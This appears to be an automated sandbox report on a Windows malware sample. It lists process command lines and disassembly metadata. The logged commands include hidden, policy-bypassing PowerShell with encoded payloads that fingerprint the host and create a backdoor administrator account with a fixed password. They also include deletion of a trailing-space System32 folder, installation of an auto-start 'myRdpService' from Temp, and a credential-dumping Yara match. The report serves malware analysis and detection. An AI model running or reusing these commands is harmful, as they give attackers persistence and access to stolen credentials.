                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:19
                                                                                                        Start time:05:11:13
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
                                                                                                        Imagebase:0x7ff650de0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:20
                                                                                                        Start time:05:11:14
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"cmd.exe" /c sc query myRdpService
                                                                                                        Imagebase:0x7ff650de0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:21
                                                                                                        Start time:05:11:14
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
                                                                                                        Imagebase:0x7ff739c60000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:22
                                                                                                        Start time:05:11:14
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:23
                                                                                                        Start time:05:11:14
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:24
                                                                                                        Start time:05:11:14
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:sc query myRdpService
                                                                                                        Imagebase:0x7ff7e83b0000
                                                                                                        File size:72'192 bytes
                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:25
                                                                                                        Start time:05:11:14
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
                                                                                                        Imagebase:0x7ff739c60000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:26
                                                                                                        Start time:05:11:14
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:27
                                                                                                        Start time:05:11:55
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"cmd.exe" /c sc query myRdpService
                                                                                                        Imagebase:0x7ff650de0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:28
                                                                                                        Start time:05:11:55
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:29
                                                                                                        Start time:05:11:55
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:sc query myRdpService
                                                                                                        Imagebase:0x7ff7e83b0000
                                                                                                        File size:72'192 bytes
                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:30
                                                                                                        Start time:05:11:55
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"cmd.exe" /c sc stop "myRdpService"
                                                                                                        Imagebase:0x7ff650de0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:31
                                                                                                        Start time:05:11:55
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:32
                                                                                                        Start time:05:11:55
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:sc stop "myRdpService"
                                                                                                        Imagebase:0x7ff7e83b0000
                                                                                                        File size:72'192 bytes
                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:33
                                                                                                        Start time:05:11:56
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"cmd.exe" /c sc query myRdpService
                                                                                                        Imagebase:0x7ff650de0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:34
                                                                                                        Start time:05:11:56
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:35
                                                                                                        Start time:05:11:56
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:sc query myRdpService
                                                                                                        Imagebase:0x7ff7e83b0000
                                                                                                        File size:72'192 bytes
                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:36
                                                                                                        Start time:05:12:04
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
                                                                                                        Imagebase:0x7ff650de0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:37
                                                                                                        Start time:05:12:04
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:38
                                                                                                        Start time:05:12:04
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:sc delete "myRdpService"
                                                                                                        Imagebase:0x7ff7e83b0000
                                                                                                        File size:72'192 bytes
                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:39
                                                                                                        Start time:05:12:04
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
                                                                                                        Imagebase:0x7ff7e83b0000
                                                                                                        File size:72'192 bytes
                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:40
                                                                                                        Start time:05:12:05
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\net.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:net start "myRdpService"
                                                                                                        Imagebase:0x7ff7b4e00000
                                                                                                        File size:59'904 bytes
                                                                                                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:41
                                                                                                        Start time:05:12:05
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\net1.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\net1 start "myRdpService"
                                                                                                        Imagebase:0x7ff7a11e0000
                                                                                                        File size:183'808 bytes
                                                                                                        MD5 hash:BA0BCCC6029FBBE6D8B41197F252742F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:42
                                                                                                        Start time:05:12:05
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\Temp\myRdpService.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\Temp\myRdpService.exe cakoi10
                                                                                                        Imagebase:0x7ff7c27f0000
                                                                                                        File size:9'427'456 bytes
                                                                                                        MD5 hash:F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: hacktool_windows_moyix_creddump, Description: creddump is a python tool to extract credentials and secrets from Windows registry hives., Source: 0000002A.00000002.4163193855.00007FF7C2CF6000.00000004.00000001.01000000.0000000A.sdmp, Author: @mimeframe
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:43
                                                                                                        Start time:05:12:18
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
                                                                                                        Imagebase:0x7ff739c60000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:44
                                                                                                        Start time:05:12:18
                                                                                                        Start date:08/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff669150000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Executed Functions

                                                                                                          Function 00007FFC4ACEF1C6 Relevance: .5, Instructions: 473COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0f921d5cc54298d0b8296fa15b303fa4d87ff61d426ab1e91647e52e5c4d577d
                                                                                                          • Instruction ID: 1048274f7aaae761e2d8dfdc95b2f3de148fa5d6261d829465b9bce473f5e40b
                                                                                                          • Opcode Fuzzy Hash: 0f921d5cc54298d0b8296fa15b303fa4d87ff61d426ab1e91647e52e5c4d577d
                                                                                                          • Instruction Fuzzy Hash: 32F1813050CA8D8FEBA8EF28C8557E977D2FB54310F2442AEE84DC7295CB35A945CB91
                                                                                                          Function 00007FFC4ACEFF72 Relevance: .5, Instructions: 459COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 07d731ba99c05cf56225f6c8916774910a5c3e3ca7136317a7c221a22d3e5bb2
                                                                                                          • Instruction ID: 4965da435985f265c50cfc2d11bf6fc8346a8d1b6e64149b4808f23a00c7c902
                                                                                                          • Opcode Fuzzy Hash: 07d731ba99c05cf56225f6c8916774910a5c3e3ca7136317a7c221a22d3e5bb2
                                                                                                          • Instruction Fuzzy Hash: 7DE1C33050CA8D8FEBA8EF28C8557E977D2FB58310F14826EE84DC7295DE39A445CB91
                                                                                                          Function 00007FFC4B450331 Relevance: .4, Instructions: 419COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3164017163.00007FFC4B450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4B450000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4b450000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 076208d5c4b48a1f0bbc81b768df2f588f662121153a59a38b267177577d2b75
                                                                                                          • Instruction ID: a3209b41202fde405d2811b8cc9d6d72e5da8b84ad11d43eb3dfd100fd0c8923
                                                                                                          • Opcode Fuzzy Hash: 076208d5c4b48a1f0bbc81b768df2f588f662121153a59a38b267177577d2b75
                                                                                                          • Instruction Fuzzy Hash: 74C1176290DFAE4FEB56EB3858251B57BE1EF46220B0801FBD14DC72A3D91CAC05C362
                                                                                                          Function 00007FFC4ACEB325 Relevance: .4, Instructions: 405COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 996a00752fb215a517ac64514a188ee039228d5dd82e48a0e2a8595fadf5cc4a
                                                                                                          • Instruction ID: e17c92f927533d4c698396c0483a3429590075a82bb91a5a2199200126e4cf13
                                                                                                          • Opcode Fuzzy Hash: 996a00752fb215a517ac64514a188ee039228d5dd82e48a0e2a8595fadf5cc4a
                                                                                                          • Instruction Fuzzy Hash: 8D31B03190DB988FEB55DB6898556F9BFA0EF66310F1482AFC089C7193CA25680ACB51
                                                                                                          Function 00007FFC4ACEFB86 Relevance: .3, Instructions: 332COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9e9ced637d94373cc69c7173285bb116904121456c3aede5c50eb70fde6c21a7
                                                                                                          • Instruction ID: c840834381ce0e6406b4e835d0c685c5498cbeba25bd994dc4b1d6c87fe93f3f
                                                                                                          • Opcode Fuzzy Hash: 9e9ced637d94373cc69c7173285bb116904121456c3aede5c50eb70fde6c21a7
                                                                                                          • Instruction Fuzzy Hash: 03B1C73050CA8D8FDBA8EF28C8557E93BD1EF55310F1442AEE84DC7296CA34A945CB92
                                                                                                          Function 00007FFC4ACF276A Relevance: .3, Instructions: 276COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a6cef95a06f4941340a86156afeba49e6389d692ea91d4f9d13ec35f8f172dab
                                                                                                          • Instruction ID: c4b27f1f41ce35e0ad0781f7a84d1f9c2e8d005a2ee8b8792669d326ff9bb54a
                                                                                                          • Opcode Fuzzy Hash: a6cef95a06f4941340a86156afeba49e6389d692ea91d4f9d13ec35f8f172dab
                                                                                                          • Instruction Fuzzy Hash: 6F81173190DB888FDB09DB6C9C466B87FF0EF56321F1442AFD089C3193DA656856CB92
                                                                                                          Function 00007FFC4ACF3018 Relevance: .2, Instructions: 207COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.3151420256.00007FFC4ACE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC4ACE0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffc4ace0000_powershell.jbxd
                                                                                                          Similarity
